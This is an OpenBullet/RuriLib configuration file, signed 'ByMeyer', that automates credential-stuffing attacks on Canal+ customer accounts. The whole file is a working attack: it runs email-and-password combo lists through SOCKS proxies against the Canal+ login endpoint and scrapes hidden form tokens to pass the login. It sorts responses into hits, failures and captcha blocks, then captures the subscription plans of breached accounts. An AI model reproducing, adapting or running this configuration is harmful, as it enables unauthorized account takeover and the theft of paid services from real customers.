{
  "$type": "RuriLib.Config, RuriLib",
  "settings": {
    "$type": "RuriLib.ConfigGeneralSettings, RuriLib",
    "configName": "MyCanal ByMeyer",
    "needsCaptchaService": false,
    "allowedCombo1": "MailPass",
    "allowedCombo2": "MailPass",
    "suggestedBots": 50,
    "lastModified": "2018-07-11T18:54:58.3198372+02:00",
    "additionalInfo": "CAPTURE & CONFIG BY MEYER. BAN PROXY NOT EU.",
    "author": "ByMeyer",
    "bbVersion": "1.1.5",
    "encrypted": false,
    "needsProxies": true,
    "onlySocks": true,
    "maxProxyUses": 0,
    "field1MinLength": 0,
    "field1MaxLength": 100,
    "field1Lowercase": false,
    "field1Uppercase": false,
    "field1Digits": false,
    "field1Symbols": false,
    "field2MinLength": 0,
    "field2MaxLength": 100,
    "field2Lowercase": false,
    "field2Uppercase": false,
    "field2Digits": false,
    "field2Symbols": false
  },
  "blockList": {
    "$type": "System.Collections.Generic.List`1[[RuriLib.BlockBase, RuriLib]], mscorlib",
    "$values": [
      {
        "$type": "RuriLib.BlockRequestAdvanced, RuriLib",
        "url": "https://compte-canal.canal-plus.com/ec/authentication?ssoconf=auth_ecrwd&urlSource=http%3A%2F%2Fm.espaceclientcanal.canal-plus.com&pass_target=http%3A%2F%2Fm.espaceclientcanal.canal-plus.com%2F&omnitureChannel=EC%20Mobile",
        "postData": "",
        "method": "GET",
        "customHeaders": {
          "$type": "System.Collections.Generic.List`1[[System.Collections.Generic.KeyValuePair`2[[System.String, mscorlib],[System.String, mscorlib]], mscorlib]], mscorlib",
          "$values": []
        },
        "customCookies": {
          "$type": "System.Collections.Generic.List`1[[System.Collections.Generic.KeyValuePair`2[[System.String, mscorlib],[System.String, mscorlib]], mscorlib]], mscorlib",
          "$values": []
        },
        "headerAccept": "*/*",
        "headerUserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36",
        "headerContentType": "application/x-www-form-urlencoded",
        "autoRedirect": true,
        "encodePost": true,
        "parseGetParams": true,
        "multipartData": false,
        "multipartBoundary": "",
        "blockLabel": "MEYER IS A GET "
      },
      {
        "$type": "RuriLib.BlockParse, RuriLib",
        "parseTarget": 2,
        "isCapture": false,
        "prefix": "",
        "suffix": "",
        "recursive": false,
        "targetCookieName": "",
        "targetHeaderName": "",
        "targetVariableName": "",
        "variableLString": "",
        "variableRString": "",
        "parseType": 1,
        "variableName": "ERROR",
        "leftString": "",
        "rightString": "",
        "cssSelector": "[name=error]",
        "attributeName": "value",
        "cssElementIndex": 0,
        "jsonField": "",
        "xPath": "",
        "xAttributeName": "",
        "regexString": "",
        "regexOutput": "",
        "blockLabel": "MEYER PARSE THE ERROR"
      },
      {
        "$type": "RuriLib.BlockParse, RuriLib",
        "parseTarget": 2,
        "isCapture": false,
        "prefix": "",
        "suffix": "",
        "recursive": false,
        "targetCookieName": "",
        "targetHeaderName": "",
        "targetVariableName": "",
        "variableLString": "",
        "variableRString": "",
        "parseType": 1,
        "variableName": "SSOMEM",
        "leftString": "",
        "rightString": "",
        "cssSelector": "[name=ssoMem]",
        "attributeName": "value",
        "cssElementIndex": 0,
        "jsonField": "",
        "xPath": "",
        "xAttributeName": "",
        "regexString": "",
        "regexOutput": "",
        "blockLabel": "MEYER PARSE SSOMEM"
      },
      {
        "$type": "RuriLib.BlockParse, RuriLib",
        "parseTarget": 2,
        "isCapture": false,
        "prefix": "",
        "suffix": "",
        "recursive": false,
        "targetCookieName": "",
        "targetHeaderName": "",
        "targetVariableName": "",
        "variableLString": "",
        "variableRString": "",
        "parseType": 1,
        "variableName": "__CHECKBOX_SSOMEM",
        "leftString": "",
        "rightString": "",
        "cssSelector": "[name=__checkbox_ssoMem]",
        "attributeName": "value",
        "cssElementIndex": 0,
        "jsonField": "",
        "xPath": "",
        "xAttributeName": "",
        "regexString": "",
        "regexOutput": "",
        "blockLabel": "MEYERPARSE CHECKBOX_SSOMEM"
      },
      {
        "$type": "RuriLib.BlockRequestAdvanced, RuriLib",
        "url": "https://compte-canal.canal-plus.com/ec/authentication?ssoconf=auth_ecrwd&urlSource=http%3A%2F%2Fm.espaceclientcanal.canal-plus.com&pass_target=http%3A%2F%2Fm.espaceclientcanal.canal-plus.com%2F&omnitureChannel=EC%20Mobile#",
        "postData": "ssoEmail=<USER>&ssoPass=<PASS>&error=<ERROR>&ssoMem=<SSOMEM>&__checkbox_ssoMem=<__CHECKBOX_SSOMEM>",
        "method": "POST",
        "customHeaders": {
          "$type": "System.Collections.Generic.List`1[[System.Collections.Generic.KeyValuePair`2[[System.String, mscorlib],[System.String, mscorlib]], mscorlib]], mscorlib",
          "$values": []
        },
        "customCookies": {
          "$type": "System.Collections.Generic.List`1[[System.Collections.Generic.KeyValuePair`2[[System.String, mscorlib],[System.String, mscorlib]], mscorlib]], mscorlib",
          "$values": []
        },
        "headerAccept": "*/*",
        "headerUserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36",
        "headerContentType": "application/x-www-form-urlencoded",
        "autoRedirect": true,
        "encodePost": true,
        "parseGetParams": true,
        "multipartData": false,
        "multipartBoundary": "",
        "blockLabel": "MEYER POST THE LOGIN"
      },
      {
        "$type": "RuriLib.BlockKeycheck, RuriLib",
        "banOn4XX": false,
        "banOnToCheck": true,
        "keyChains": {
          "$type": "System.Collections.Generic.List`1[[RuriLib.ResponseKeyChain, RuriLib]], mscorlib",
          "$values": [
            {
              "$type": "RuriLib.ResponseKeyChain, RuriLib",
              "keychainType": 0,
              "keychainMode": 0,
              "keys": {
                "$type": "System.Collections.Generic.List`1[[RuriLib.ResponseKey, RuriLib]], mscorlib",
                "$values": [
                  {
                    "$type": "RuriLib.ResponseKey, RuriLib",
                    "keyField": 5,
                    "keyType": 0,
                    "keyString": "s_pass_userdata",
                    "notKey": false,
                    "matchKey": false,
                    "variableString": "",
                    "condition": 4
                  },
                  {
                    "$type": "RuriLib.ResponseKey, RuriLib",
                    "keyField": 5,
                    "keyType": 0,
                    "keyString": "s.eVar11=",
                    "notKey": false,
                    "matchKey": false,
                    "variableString": "",
                    "condition": 4
                  }
                ]
              }
            },
            {
              "$type": "RuriLib.ResponseKeyChain, RuriLib",
              "keychainType": 1,
              "keychainMode": 0,
              "keys": {
                "$type": "System.Collections.Generic.List`1[[RuriLib.ResponseKey, RuriLib]], mscorlib",
                "$values": [
                  {
                    "$type": "RuriLib.ResponseKey, RuriLib",
                    "keyField": 5,
                    "keyType": 0,
                    "keyString": "'non identifie'",
                    "notKey": false,
                    "matchKey": false,
                    "variableString": "",
                    "condition": 4
                  }
                ]
              }
            },
            {
              "$type": "RuriLib.ResponseKeyChain, RuriLib",
              "keychainType": 2,
              "keychainMode": 0,
              "keys": {
                "$type": "System.Collections.Generic.List`1[[RuriLib.ResponseKey, RuriLib]], mscorlib",
                "$values": [
                  {
                    "$type": "RuriLib.ResponseKey, RuriLib",
                    "keyField": 5,
                    "keyType": 0,
                    "keyString": "\"recaptchaContainer\"",
                    "notKey": false,
                    "matchKey": false,
                    "variableString": "",
                    "condition": 4
                  }
                ]
              }
            }
          ]
        },
        "blockLabel": "MEYER CHECK THE ACCOUNT"
      },
      {
        "$type": "RuriLib.BlockRequestAdvanced, RuriLib",
        "url": "https://m.secure.espaceclientcanal.canal-plus.com/secure/3/abonne/mon-compte/abonnement/modif-abo/pid253-consulter-mon-abonnement.html",
        "postData": "",
        "method": "GET",
        "customHeaders": {
          "$type": "System.Collections.Generic.List`1[[System.Collections.Generic.KeyValuePair`2[[System.String, mscorlib],[System.String, mscorlib]], mscorlib]], mscorlib",
          "$values": []
        },
        "customCookies": {
          "$type": "System.Collections.Generic.List`1[[System.Collections.Generic.KeyValuePair`2[[System.String, mscorlib],[System.String, mscorlib]], mscorlib]], mscorlib",
          "$values": []
        },
        "headerAccept": "*/*",
        "headerUserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36",
        "headerContentType": "application/x-www-form-urlencoded",
        "autoRedirect": true,
        "encodePost": true,
        "parseGetParams": true,
        "multipartData": false,
        "multipartBoundary": "",
        "blockLabel": "MEYER CAPTURE LES ABONNEMENTS"
      },
      {
        "$type": "RuriLib.BlockParse, RuriLib",
        "parseTarget": 2,
        "isCapture": false,
        "prefix": "",
        "suffix": "",
        "recursive": true,
        "targetCookieName": "",
        "targetHeaderName": "",
        "targetVariableName": "",
        "variableLString": "",
        "variableRString": "",
        "parseType": 0,
        "variableName": "Abonnement:",
        "leftString": "=\"libAbo",
        "rightString": "</span>\n         ",
        "cssSelector": "",
        "attributeName": "",
        "cssElementIndex": 0,
        "jsonField": "",
        "xPath": "",
        "xAttributeName": "",
        "regexString": "",
        "regexOutput": "",
        "blockLabel": "MEYER FAIT DES CAPTURES"
      }
    ]
  }
}